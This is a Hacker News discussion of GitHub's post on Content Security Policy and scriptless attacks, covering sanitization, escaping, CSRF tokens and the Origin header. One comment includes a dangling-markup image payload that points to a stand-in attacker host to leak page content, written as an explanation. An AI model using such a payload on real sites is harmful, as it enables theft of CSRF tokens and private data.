The article says CSP seven times in the first two paragraphs without saying what it stands for; it would be much more readable if it did. (It stands for Content Security Policy, for those wondering.)
Funnily enough, I tried doing exactly that when I submitted the post to HN this morning: https://news.ycombinator.com/item?id=13437920. But, unfortunately, my submission wasn't the one to make the front page.
Apologies for that not being clear. Since I had linked to the original article in the first sentence, I assumed readers would know which "CSP" I was talking about. I'll update the post in the morning to spell out and link the first CSP reference.
If you ever have a post-Communicating Sequential Processes journey at GitHub, please do write a post! Most people I know are moving to something CSP-based (say, Go channels), so it would be very cool to understand why someone would consciously decide to ditch the concept again after a serious engineering effort.
Heh, I was slightly confused at first, then very confused when I got to "post-CSP exploitation". Trying to come up with a plausible meaning for that phrase is an interesting exercise.
At a certain point you need to set a baseline expectation of your audience in order to communicate effectively. Do you think they should also explain exploitation, img-src, the mechanics of parsing unmatched quotes, JavaScript, or CSRF? The target audience of the article knows what CSP stands for and has most likely been reading the other entries along this journey.
You are getting downvoted because, in complaining that we are below your technical baseline, you've ironically revealed you're not familiar with the rather more interesting CSP.
I did already know about content security policy. I still wasn't certain that's what the article was referring to without reading several paragraphs of the two articles.
I think this comment raises a very good point, and I struggle to see why it's proving so unpopular so far.
It's true that the submitted blog post doesn't expand the CSP initialism -- this has been acknowledged as an oversight by the author and the post will be edited, as it's simply good practice as recommended in several style guides [1][2][3][4].
But the post's very first sentence links to a previous entry about the same subject; there, the topic is explained to readers who may not be familiar with it. There is simply no reason for a follow-up post, which this submission is, to repeat the explanations given by its predecessor. Meanwhile, a reader approaching the post with confidence about its topic will have realized rapidly what it is and isn't about.
So given the intense disagreement, what approach would have been preferable?
I think your comment is much more reasonable than the parent; I too wondered what CSP they were talking about, so I clicked the first link and figured it out (after scrolling through several paragraphs). However, the parent asserted that the audience here was not up to the level required to read the author, when actually the confusion was an overloaded acronym.
My comment was not about establishing an across-the-board level of technical competence. In my opinion the audience was not general tech people; the audience is security / infrastructure folks. I apologize if anyone felt slighted.
I would expect them to expect their readers to look up concepts that are unfamiliar. Throwing around overloaded acronyms without definition makes that difficult.
A very detailed post, which talks about their collaboration with the security consulting firm Cure53 to identify various fairly novel exfiltration techniques and attempts to adjust their Content-Security-Policy, or some aspect of their application, to mitigate them. This could be a great resource, and is certainly a valuable 'lessons learned'.
But I was also overwhelmed. There's a quip that security is a losing battle, but that wasn't my takeaway -- rather, the knowledge required to develop and host a web application that accepts user-generated content, in a way that won't leak info from seemingly everywhere, is becoming too much for generalist developers working alone or in small teams.
They're interesting and often-overlooked techniques, but they are not novel. You can read more about these sorts of attacks, and other similar ones, in the 2011 writeup "Postcards from the post-XSS world" [0].
Tone: I assume GitHub knows what they are doing, and I ask this question because I have a hole in my understanding that I have a professional interest in filling, not because I'm trying to "gotcha!" anybody or be critical. This article clearly demonstrates they are trying hard and are not ignorant.
I don't understand why so much of this article talks about dangling markup. While I highly recommend using the highest-quality library you can get your hands on for this task, cleaning up user-supplied markup to at least be valid HTML is generally not that difficult. Cleaning up every last vector within that valid HTML is much harder and much more subtle; I have fought that fight myself, so I understand the bits about how awful the <plaintext> tag can be and so forth (and how many other vectors there are for JavaScript, how many vectors there are for loading content you didn't want loaded, how many vectors there are for subtle leaks of information, etc., even within syntactically valid HTML). But making syntactically invalid HTML into syntactically valid HTML that is at least not "dangling" is not that hard, and can be done reliably.
So I assume I'm missing some sort of context here about why they are having so much trouble with this? What's the context where they can't run this sort of syntax cleaner over the user input?
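For reference, the kind of syntax cleaner I have in mind is roughly this, as a browser-context sketch (a real implementation would use a hardened library; `wellForm` is a name I just made up):

    // Run the input through the browser's forgiving HTML parser and
    // reserialize it, so open tags come back balanced. Well-formed output is
    // necessary for avoiding dangling markup, but not sufficient for safety;
    // you still need a real sanitizer for the subtler vectors.
    function wellForm(dirty: string): string {
      const doc = new DOMParser().parseFromString(dirty, "text/html");
      return doc.body.innerHTML;
    }

    wellForm("<b>hello <i>world");
    // => "<b>hello <i>world</i></b>"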
Yeah, the missing context is that we are talking about vectors where GitHub would not be sanitizing the input correctly. In other words, vectors that traditionally resulted in XSS. We do exactly as you say in places where we expect user-controlled input. For example, all issue/pull request comments are Markdown. And, for security, we go to great lengths to ensure that we only accept a subset of HTML that is safe AND that the resulting HTML is well formed.

But, as history has shown, XSS is more or less unavoidable. There are just too many places where it can occur for any application to 100% avoid it. This is at the heart of CSP: given that history has shown XSS to be unavoidable, the idea was to add a browser feature as a second line of defense.

So, the article is written from the perspective that traditional XSS is neutered (the whole "scripting" bit of XSS is gone) using CSP. Given that, what might an attacker be able to do without injecting any JavaScript? This is the origin of "scriptless attacks", and dangling markup is the most popular technique for exploiting one. So, it isn't that GitHub would be failing to create well-formed HTML. It would be a scenario where an attacker would traditionally like to have injected a `<script>` tag, but is no longer able, so they must go to the next best thing: dangling markup.
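To make "dangling markup" concrete, here is a sketch of the kind of injected fragment involved (the attacker host is made up):

    // A hypothetical injected fragment; the src attribute is deliberately
    // left unterminated. The browser keeps consuming the page as part of the
    // URL until it hits the next matching quote, so whatever sensitive markup
    // follows the injection point (say, a CSRF token in a later form) gets
    // shipped to the attacker's server inside the image request.
    const injected = "<img src='https://attacker.example/steal?";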
XSS is unavoidable if you think the solution is sanitizing user input.
The solution to SQL injection is parameterized query construction, instead of automatically filtering the ' character and then pasting the template and the user input together.
Similarly, to avoid cross-site scripting you have to combine your templates and user input by escaping the input properly, instead of just concatenating them and hoping you can avoid the issues with input 'sanitizing'.
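As a toy sketch of what combining-by-escaping looks like (all names made up):

    // A minimal HTML-aware template: interpolated values are escaped at the
    // moment template and input are combined, so input can't alter the markup.
    const escapes: Record<string, string> = {
      "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
    };

    function escapeHtml(s: string): string {
      return s.replace(/[&<>"']/g, (c) => escapes[c]);
    }

    function html(parts: TemplateStringsArray, ...values: unknown[]): string {
      return parts.reduce(
        (out, part, i) =>
          out + part + (i < values.length ? escapeHtml(String(values[i])) : ""),
        ""
      );
    }

    html`<p>${"<script>alert(1)</script>"}</p>`;
    // => "<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>"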
> cleaning up user-supplied markup to at least be valid HTML
The root cause of XSS is improper sanitization of user input. Usually it happens in places that shouldn't allow HTML at all, where the developer forgot to properly HTML-escape the user-provided input. If failing to encode the input at all can slip by, then failing to verify that it's valid HTML obviously can too (besides, it doesn't make sense to verify that input is valid HTML when you aren't even expecting HTML).
The focus on dangling markup is because a CSP policy that prevents unauthorized JavaScript from executing (no inline scripts, remote scripts from trusted hosts only) can resolve most of the XSS issues, but it doesn't resolve leakage of information over other channels (such as via images).
While CSP could be used to completely block images from external hosts (and thus solve the leakage issue), you sometimes do want to allow users to inline external images and so an alternative solution to prevent sensitive information from being leaked is required.
Edit: I hadn't seen ptoomey3's comment while writing mine. He explained it better :-)
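Edit 2: for concreteness, a policy along those lines might look like this (a sketch, not GitHub's actual header; the proxy host is invented and Node's built-in http module is just a stand-in):

    import { createServer } from "http";

    const CSP = [
      "default-src 'none'",          // block everything not explicitly allowed
      "script-src 'self'",           // no inline scripts; own origin only
      "img-src 'self' https://camo.example.com", // plus one trusted image proxy
    ].join("; ");

    createServer((req, res) => {
      res.setHeader("Content-Security-Policy", CSP);
      res.end("<p>hello</p>");
    }).listen(8080);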
I have serious reservations about CSP, however. I think it breaks the web in a way that wouldn't have been necessary had we been a little more careful about HTML syntax, rather than dismissing markup validation as an obsolete technique back when the vulgar "HTML 5 rocks" campaigns were in full swing.
CSP spec drafts have been around forever but were never finalized. CSP basically blocks execution of JavaScript in script tags in content (as opposed to script in the header), as well as in content handler attributes (onclick and co.), by disabling those altogether on a page. This totally breaks page composability, where you assemble content at the markup-stream level from multiple sources, like, say, on every single news aggregation site. The removal of scoped CSS styles from HTML similarly breaks composition.
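To illustrate, under such a policy even a trivial inline handler stops working and has to be rewritten against the DOM in an external script (a sketch; `vote` stands in for whatever the page did inline):

    // Blocked by a typical CSP:
    //   <button id="vote" onclick="vote(42)">Vote</button>
    // The CSP-compatible rewrite, shipped as an external whitelisted script:
    declare function vote(id: number): void; // hypothetical existing handler

    document.getElementById("vote")?.addEventListener("click", () => vote(42));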
From Chrome's Content Security Policy page:
[Blocking inline script] does, however, require you
to write your code with a clean separation between
content and behavior (which you should of course
do anyway, right?)
I think this comment is totally clueless wrt. what the Web is about. "Separation of concerns" is most certainly not a characteristic of the Web, and never has been.
I'm sorry, but rather than using kludges such as CSP to turn the lights off with a broad brush, how about fixing HTML and JavaScript in the first place?
(Note my comment isn't addressed at GitHub but at web standards committees.)
"I'm sorry, but rather than using kludges such as CSP to turning the lights off with a broad brush, how about fixing HTML and JavaScript in the first place?"
OK... how?
To be clear, I'm asking for an HN-comment level of detail, not a standards-body level of detail. I can't speak for everyone else on HN, but I won't go over things with a fine-tooth comb; I'll only look at top-level issues.
But I will at least point out that the ability to casually float third-party content into any site (one that has a weakness to XSS or man-in-the-middle, or a vulnerability in any of its other third-party content) is pretty fundamental. The composition power of the web is simply too great, and it is going to have to be cut back. Some of the obvious solutions, like whitelisting hashes of valid content, have their own problems; for instance, a lot of the scripts being included out there deliberately change from load to load, and that's their whole point in the first place.
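As a sketch of one incarnation of the hash-whitelisting idea (CSP script hashes; the inline script here is a stand-in), the policy pins the exact bytes of the script, which is precisely what breaks for scripts that change on every load:

    import { createHash } from "crypto";

    // Only an inline script whose SHA-256 digest appears in the policy may run.
    const inlineScript = "console.log('analytics stub');";
    const digest = createHash("sha256").update(inlineScript).digest("base64");
    const csp = `script-src 'sha256-${digest}'`;
    // i.e. Content-Security-Policy: script-src 'sha256-<digest computed above>'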
1. Defining and using safe JavaScript subsets (in the style of Google's Caja [3] and AdSafe [4], though probably that ship has sailed and cramming syntax sugar into JS is the order of the day instead)
2. Defining and using safe CSS subsets (with countermeasures against click-jacking/-phishing, hiding the "nose print", etc.), though granted this is challenging; I had hoped a formal semantics for CSS would come along (such as in [2]), but it didn't
3. Using HTML-aware template engines (such as [1], though there may be lighter approaches with hard-coded HTML rules as well; disclaimer: [1] is my project)
If all browsers sent the "Origin" HTTP header [1] with POST requests (such that web applications could rely on it), then the CSRF [2] tokens mentioned in the article would become obsolete. You'd just have to check whether the "Origin" header sent by the browser is identical to your scheme + domain name (e.g. "https://www.example.com") and be done. Chrome and Safari implemented the "Origin" header long ago, but unfortunately Firefox [3] and Edge [4] have not yet done so.
The "Origin" header is similar to the "Referer" header but never contains the path or query. Furthermore, CSRF protection requires it only for "POST" requests (i.e. "GET" requests are unaffected). So there is little incentive for an option disable it for privacy concerns.
"It's probably worth reading through https://github.com/w3c/resource-timing/issues/64 and the proposal I linked above. In short, it's not clear that implementing the Origin header the way Chrome supports it actually helps with CSRF and it makes it harder (impossible really) to distinguish CORS requests."
Seems Firefox will implement it anyway because it's still better than nothing.
The Origin header is not as good for preventing CSRF, since it's a known value. A CSRF token is a one-time value generated on the server; it's impossible to guess or to get a valid one from the outside.
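For reference, the token scheme is roughly this (a sketch; session handling is elided, the names are made up, and a strictly one-time token would additionally be rotated after each use):

    import { randomBytes, timingSafeEqual } from "crypto";

    type Session = { csrfToken?: string };

    // Mint an unguessable value and render it into the server's own forms
    // (e.g. as a hidden <input>); a cross-site page can't read it.
    function issueToken(session: Session): string {
      session.csrfToken = randomBytes(32).toString("hex");
      return session.csrfToken;
    }

    // Verify the submitted value on every POST, in constant time.
    function checkToken(session: Session, submitted: string): boolean {
      if (!session.csrfToken) return false;
      const expected = Buffer.from(session.csrfToken);
      const actual = Buffer.from(submitted);
      return expected.length === actual.length && timingSafeEqual(expected, actual);
    }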
It boils down to how much you trust browsers to implement this without fucking up. In the past trusting browsers to get it right was a questionable idea, with Flash being a particularly reliable weak point which caused Rails to change how they do CSRF protection. I'm not sure Adobe ever fully fixed the issue in all browsers.
Nonces have the benefit of only relying on browsers preventing cross-domain reads.
When Flash is deprecated, and if a site wants to use CSP, then this might start looking like a better trade off.
ATM though, nonces can be automatically added to all same-domain forms on your site with JavaScript, and you can check them trivially on all POST requests, getting most of the non-CSP-related benefits without waiting on browsers.
And even if browsers were to implement it, there is still a long tail of browsers out there that will take forever to update.
CSRF protection is not about attacks from evil clients (you can easily spoof any header with the HTTP client library of your choice, of course). CSRF protection is about preventing innocent / well-behaving clients from being tricked into POSTing some data on behalf of their (logged-in) user.
Yes. Forwarding a unique CSRF token from the backend gives you some assurance that it's a legitimate request, initiated from a pageview within a given timeframe. A header (Origin) which always has the same value (the scheme and hostname) is inherently less secure, though I overstated how much in the previous comment.
You can use it to identify unsophisticated attacks, sure.
However, if someone has the ability to make malicious HTTP requests on my behalf using my browser, can you really be sure that they don't have the ability to make malicious HTTP requests with altered headers, through a malicious extension or a browser-specific exploit or some other vector?
You still have to do all the other attack mitigation strategies in addition to checking the Origin header, and I'm not sure the extra complexity buys you anything in the long-term.
Not sure I follow your reasoning: CSRF requires a browser, as that's where you'll find a logged-in user that you want to force into doing something without their knowledge. The network layer is already protected by HTTPS. Some browser plugin might modify the header, at which point the whole exercise is pointless anyway as you can't trust the client in that case. Happy to learn where I'm wrong.
Can you expand on the threat model here? After noodling a bit, I can't think of an attack that a CSRF token prevents but an Origin header check wouldn't, though obviously that doesn't mean there isn't one. I'd be real curious to hear of one!
Can someone explain more about how the Gravatar example would work? How would the attacker embed dangling markup on GitHub.com? If they could do that, couldn't they just use a standard XSS attack by embedding arbitrary HTML?
Yes, the attack assumes a content injection bug in GitHub.com. The attack is not using our own gravatar URL generation against us; it is the attacker crafting an arbitrary URL and using that URL inside of an arbitrary image tag. The reason for the attacker being "forced" to use a gravatar URL is that it was one of the very few third-party hosts we previously allowed by our CSP policy. So, the attack demonstrates how this previously allowed host could be used to exfiltrate sensitive content if/when an attacker found a way to inject arbitrary HTML into a page on GitHub.com.
While I'm not a security expert, seeing the various ways someone can steal info from a site even after all the protections GitHub put into place was fascinating, and it brings back the old concern: if a site as large and respected as GitHub has to do all this work and still encounters exploits, what can an average person do who might be running ad scripts, a tracking script, and a few helper scripts from various sites? And how can tools put more protections in place for average folks (cough, WordPress)?
If you liked this, btw, it's worth reading some of the material from their pentesters at https://cure53.de/ , which also has some interesting findings and links.